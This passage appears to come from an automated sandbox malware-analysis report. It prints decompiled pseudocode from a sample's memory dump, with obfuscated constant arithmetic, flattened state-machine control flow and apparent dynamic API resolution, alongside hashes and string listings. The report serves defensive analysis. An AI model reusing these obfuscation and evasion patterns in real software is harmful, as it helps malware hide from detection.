				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E0034CD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E00358606(_v148, 0x341690, __eflags);
				E00342206( &_v128, _t209, _v196, _v200, _t174, E0034EE81(__eflags), _v184);
				_t178 = E0034A8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}

0x0035000b
0x00350012
0x00350014
0x00350015
0x00350016
0x0035001b
0x00350020
0x00350023
0x0035002d
0x00350035
0x0035003a
0x00350042
0x00350047
0x0035004f
0x00350057
0x00350065
0x0035006a
0x00350070
0x00350078
0x00350080
0x00350085
0x0035008d
0x00350095
0x0035009d
0x003500a5
0x003500ad
0x003500b5
0x003500bd
0x003500c5
0x003500cd
0x003500d5
0x003500e2
0x003500e5
0x003500e9
0x003500f1
0x003500f9
0x00350109
0x0035010d
0x00350115
0x0035011d
0x00350129
0x0035012e
0x00350134
0x0035013c
0x00350144
0x0035014c
0x00350151
0x00350159
0x00350166
0x00350167
0x0035016b
0x00350173
0x0035017b
0x00350189
0x0035018d
0x00350195
0x0035019f
0x003501ad
0x003501b2
0x003501c1
0x003501c6
0x003501d5
0x003501d8
0x003501dc
0x003501e4
0x003501f1
0x003501f5
0x003501fd
0x00350205
0x0035020d
0x00350212
0x0035021a
0x00350227
0x0035022b
0x00350233
0x0035023d
0x00350280
0x00350285
0x00350289
0x0035028b
0x0035028d
0x0035028f
0x00350295
0x00350295
0x00350297
0x0035029d
0x0035029d
0x0035029f
0x003502a5
0x003502a5
0x003502a1
0x003502a1
0x003502a3
0x00000000
0x00000000
0x003502a3
0x00350299
0x00350299
0x0035029b
0x00000000
0x00000000
0x0035029b
0x00350291
0x00350291
0x00350293
0x00000000
0x00000000
0x00350293
0x003502a8
0x003502a9
0x003502a9
0x003502ae
0x00000000
0x0035023f
0x00350241
0x00350257
0x00350271
0x00350276
0x00350279
0x00000000
0x00350243
0x00350249
0x0035024f
0x00000000
0x0035024f
0x00350249
0x00350241
0x0035030f
0x0035030f
0x00350315
0x00000000
0x00000000
0x00350325
0x00350325
0x003502b2
0x003502bb
0x003502bf
0x003502c7
0x003502f3
0x00350302
0x00350307
0x0035030a
0x00000000

Strings

YX., xrefs: 00350115
eP)s, xrefs: 00350085
{So, xrefs: 00350023
*&B, xrefs: 00350095
iFG, xrefs: 003501E4

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *&B$YX.$eP)s$iFG${So
API String ID: 0-3810143839
Opcode ID: 3a8b6b38d611c5aa04b2b784c739f81290996ca1773832349f08143b81cd63cc
Instruction ID: 8110ece3a678e4947ec1bfc105a4f5ed38cd87ad05b310f4a8da9a87977b0f76
Opcode Fuzzy Hash: 3a8b6b38d611c5aa04b2b784c739f81290996ca1773832349f08143b81cd63cc
Instruction Fuzzy Hash: 508196B15093409BD3A8CF25D589A1BBBE2BBC5718F00591DF9C59A260D3B9C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00347735 Relevance: 6.4, Strings: 5, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00347735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E003520B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E00347FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E00360C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E00350DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E00360E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E00360E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E00343DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

0x0034773c
0x00347745
0x0034774d
0x00347754
0x0034775b
0x0034775c
0x0034775d
0x0034775f
0x00347764
0x00347772
0x00347775
0x00347778
0x0034777f
0x00347780
0x00347781
0x00347789
0x00347791
0x00347799
0x003477a1
0x003477a9
0x003477b1
0x003477b9
0x003477c1
0x003477c9
0x003477d1
0x003477d9
0x003477de
0x003477e6
0x003477ee
0x003477fb
0x003477fc
0x00347800
0x00347808
0x00347810
0x00347815
0x0034781d
0x00347825
0x0034782d
0x0034783b
0x0034783f
0x00347847
0x0034784f
0x00347857
0x0034785f
0x00347867
0x0034786f
0x00347877
0x0034787f
0x00347887
0x0034788f
0x00347897
0x0034789f
0x003478a7
0x003478af
0x003478b7
0x003478bb
0x003478c3
0x003478cb
0x003478d3
0x003478db
0x003478e3
0x003478eb
0x003478f3
0x003478fb
0x00347903
0x00347908
0x00347910
0x0034791d
0x00347921
0x0034792e
0x0034793b
0x00347943
0x00347948
0x0034794d
0x00347955
0x00347962
0x00347966
0x00347973
0x00347977
0x0034797f
0x00347987
0x0034798f
0x00347997
0x0034799f
0x003479a7
0x003479af
0x003479af
0x003479bd
0x00347aac
0x00347aad
0x00347aae
0x00347ab3
0x00347ab7
0x00347ab9
0x00347abf
0x00000000
0x00347abf
0x003479c3
0x003479c5
0x00347a90
0x00347a93
0x00000000
0x003479cb
0x003479d1
0x00347a7c
0x00347a7e
0x00347a81
0x00000000
0x003479d7
0x003479dd
0x00347a4f
0x00347a66
0x00347a6b
0x00347a6e
0x00000000
0x003479df
0x003479e5
0x00347a35
0x00347a3d
0x00347a42
0x00347a45
0x00000000
0x003479e7
0x003479e7
0x003479ed
0x00000000
0x003479f3
0x00347a0b
0x00347a10
0x003479ed
0x003479e5
0x003479dd
0x003479d1
0x003479c5
0x00347a13
0x00347a24
0x00347a24
0x00347ad8
0x00347add
0x00347ae0
0x00347ae5
0x00347ae5
0x00347ae5
0x00000000

Strings

m>j7, xrefs: 003478DB
,Wr, xrefs: 00347A35
G /, xrefs: 00347A4F
q{, xrefs: 00347929
{9Y, xrefs: 00347867

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,Wr$G /$m>j7$q{${9Y
API String ID: 0-2956538602
Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
Instruction ID: 0b5e56d9e80fcef1b57fcddb6cd5a0a3c99a6e08f8bb5aab2c1a1041625e2fb3
Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
Instruction Fuzzy Hash: 5D912D710093419FD769CF65DA8692BBBF1FBC4748F10991CF2929A220D3B5DA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 00344816 Relevance: 6.4, Strings: 5, Instructions: 180
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00344816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E0035847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E00347FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E0035847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}

0x0034481d
0x00344821
0x00344823
0x00344827
0x0034482b
0x0034482f
0x00344830
0x00344831
0x00344836
0x0034483b
0x0034483e
0x00344848
0x00344850
0x00344852
0x0034485a
0x0034485f
0x00344867
0x0034486c
0x00344874
0x00344879
0x00344881
0x00344889
0x0034488e
0x00344896
0x0034489e
0x003448a6
0x003448ae
0x003448b3
0x003448bb
0x003448c3
0x003448cb
0x003448d3
0x003448db
0x003448ea
0x003448ed
0x003448f1
0x003448f6
0x003448fe
0x00344906
0x0034490e
0x00344916
0x0034491e
0x00344926
0x0034492e
0x00344936
0x0034493e
0x00344948
0x0034494c
0x00344954
0x0034495c
0x00344964
0x0034496c
0x0034497c
0x00344980
0x00344988
0x00344994
0x00344997
0x0034499b
0x003449a3
0x003449ab
0x003449b3
0x003449bb
0x003449c3
0x003449cb
0x003449d5
0x003449e3
0x003449e8
0x003449ee
0x003449fb
0x00344a03
0x00344a0b
0x00344a13
0x00344a1b
0x00344a23
0x00344a2f
0x00344a37
0x00344a3b
0x00344a43
0x00344a4b
0x00344a53
0x00344a5b
0x00344a63
0x00344a6b
0x00344a73
0x00344a7b
0x00344a83
0x00344a83
0x00344a8d
0x00344ac9
0x00000000
0x00344a8f
0x00344a91
0x00344b4f
0x00344a97
0x00344a9d
0x00000000
0x00344a9f
0x00344aaf
0x00344ab0
0x00344ab9
0x00344abf
0x00344ac5
0x00000000
0x00344ac5
0x00344abf
0x00344a9d
0x00344a91
0x00344b58
0x00344b60
0x00344b60
0x00344afa
0x00344aff
0x00344b04
0x00344b10
0x00000000
0x00344b06
0x00344b06
0x00000000
0x00344b06
0x00000000
0x00344b15
0x00344b15
0x00000000

Strings

62, xrefs: 00344A03
z, xrefs: 00344A53
?M', xrefs: 003449FB
h\c, xrefs: 00344A9F
-e, xrefs: 00344964

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -e$62$?M'$h\c$z
API String ID: 0-1842174784
Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
Instruction ID: 76ea2928f1b397ca2626d0752b2bf1d87290f8d153ffce0e689d781b9873ad4d
Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
Instruction Fuzzy Hash: 13813F715093819FC3A8CF61C58991FBBF1FBC9758F409A1CF6958A260C7B6DA088F42

Uniqueness

Uniqueness Score: -1.00%

Function 0035BE27 Relevance: 6.4, Strings: 5, Instructions: 130
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0035BE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E0034ADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E0035DBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E0034CDCD(_v56, _v20);
					}
					_t139 = E0035CADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}

0x0035be30
0x0035be39
0x0035be3d
0x0035be44
0x0035be4b
0x0035be52
0x0035be59
0x0035be60
0x0035be67
0x0035be6e
0x0035be72
0x0035be79
0x0035be80
0x0035be87
0x0035be8e
0x0035be95
0x0035bea3
0x0035bea5
0x0035beaa
0x0035beb2
0x0035beb7
0x0035bebc
0x0035bec3
0x0035beca
0x0035bece
0x0035bed5
0x0035bedc
0x0035bee3
0x0035beea
0x0035bef1
0x0035bef8
0x0035beff
0x0035bf06
0x0035bf0a
0x0035bf11
0x0035bf18
0x0035bf1c
0x0035bf20
0x0035bf27
0x0035bf2e
0x0035bf35
0x0035bf3c
0x0035bf49
0x0035bf50
0x0035bf5b
0x0035bf5c
0x0035bf5f
0x0035bf66
0x0035bf6d
0x0035bf74
0x0035bf80
0x0035bf86
0x0035bf89
0x0035bf90
0x0035bf97
0x0035bf9e
0x0035bfa1
0x0035bfa8
0x0035bfb9
0x0035bfb9
0x0035bfbd
0x00000000
0x00000000
0x0035bfb3
0x0035bfc1
0x0035bfb5
0x0035bfb5
0x0035bfb7
0x0035bfb8
0x00000000
0x0035bfb8
0x0035bfc4
0x0035bfd9
0x0035bfdf
0x0035bffd
0x0035c00c
0x0035c011
0x0035c019
0x0035c01a
0x0035c023
0x00000000
0x0035c029
0x0035bff0
0x0035bff5
0x0035bffb
0x00000000
0x00000000
0x0035c031
0x0035c031
0x00000000

Strings

Gb, xrefs: 0035BE44
ThFT, xrefs: 0035BE80
H^, xrefs: 0035BF11
L-R, xrefs: 0035BEEA
iR6, xrefs: 0035BE30

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gb$L-R$ThFT$iR6$H^
API String ID: 0-1567385930
Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
Instruction ID: 3c713765b3e0c1574cd0acf2fdfdd9f44fa912bb60cc3f5fa2631bb23a98e007
Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
Instruction Fuzzy Hash: 74512171C05219EBDF19CFA4D94A8EEFBB1FB09318F208159D812BA260C3B51A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

GetKeyState.USER32(00000010), ref: 1001B463
GetKeyState.USER32(00000011), ref: 1001B46C
GetKeyState.USER32(00000012), ref: 1001B475
SendMessageA.USER32 ref: 1001B48B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
